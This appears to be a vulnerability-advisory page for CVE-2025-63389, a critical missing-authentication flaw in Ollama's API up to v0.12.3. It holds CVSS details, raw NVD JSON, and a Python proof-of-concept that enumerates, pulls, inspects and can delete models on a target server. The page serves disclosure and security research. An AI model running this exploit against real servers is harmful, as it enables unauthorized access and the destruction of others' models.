Security Vulnerability Report
中文
CVE-2025-63389 CVSS 9.8 CRITICAL

CVE-2025-63389

Published: 2025-12-18 16:15:55
Last Modified: 2026-01-22 18:16:44
Source: [email protected]

Description

A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:* - VULNERABLE
Ollama < v0.12.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-63389 PoC - Ollama Authentication Bypass # Target: Ollama API endpoints without authentication TARGET_IP = "<target_ip>" TARGET_PORT = "11434" BASE_URL = f"http://{TARGET_IP}:{TARGET_PORT}" def check_ollama_version(): """Check Ollama version""" try: resp = requests.get(f"{BASE_URL}/api/version", timeout=5) print(f"[*] Ollama Version: {resp.json().get('version', 'unknown')}") return True except Exception as e: print(f"[!] Failed to connect: {e}") return False def list_models(): """List all available models - No auth required""" try: resp = requests.get(f"{BASE_URL}/api/tags", timeout=5) if resp.status_code == 200: models = resp.json().get('models', []) print(f"[*] Found {len(models)} models:") for model in models: print(f" - {model.get('name')} ({model.get('size', 'unknown')} bytes)") return models except Exception as e: print(f"[!] Failed to list models: {e}") return [] def pull_model(model_name): """Pull a model from registry - No auth required""" try: print(f"[*] Pulling model: {model_name}") resp = requests.post( f"{BASE_URL}/api/pull", json={"name": model_name}, stream=True, timeout=300 ) print(f"[*] Pull response status: {resp.status_code}") return resp.status_code == 200 except Exception as e: print(f"[!] Failed to pull model: {e}") return False def delete_model(model_name): """Delete a model - No auth required""" try: print(f"[*] Deleting model: {model_name}") resp = requests.delete( f"{BASE_URL}/api/delete", json={"name": model_name} ) print(f"[*] Delete response status: {resp.status_code}") return resp.status_code == 200 except Exception as e: print(f"[!] Failed to delete model: {e}") return False def get_model_info(model_name): """Get model information - No auth required""" try: print(f"[*] Getting info for model: {model_name}") resp = requests.post( f"{BASE_URL}/api/show", json={"name": model_name} ) if resp.status_code == 200: print(f"[*] Model info: {json.dumps(resp.json(), indent=2)}") return resp.json() except Exception as e: print(f"[!] Failed to get model info: {e}") return None def main(): print("=" * 60) print("CVE-2025-63389 PoC - Ollama Authentication Bypass") print("=" * 60) if not check_ollama_version(): print("[!] Ollama service not accessible") return # List all models (information disclosure) print("\n[+] Step 1: Enumerate available models") models = list_models() if not models: print("[*] No models found, trying to pull one...") pull_model("llama2") list_models() # Demonstrate unauthorized model operations if models: target_model = models[0].get('name') print(f"\n[+] Step 2: Get model info (unauthorized)") get_model_info(target_model) print(f"\n[!] WARNING: Model deletion would destroy: {target_model}") print("[+] For educational purposes only - do not execute delete") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63389", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:54.760", "lastModified": "2026-01-22T18:16:43.500", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.12.3", "matchCriteriaId": "ECF7F9A4-2538-4FCE-8BBB-7EB95E91D756"}]}]}], "references": [{"url": "https://gist.github.com/Cristliu/48dae561696374744d9fced07a544ecd", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gist.github.com/Cristliu/b6f4d070fb27932f581be1aadc0923e7", "source": "[email protected]"}, {"url": "https://github.com/ollama/ollama/issues", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.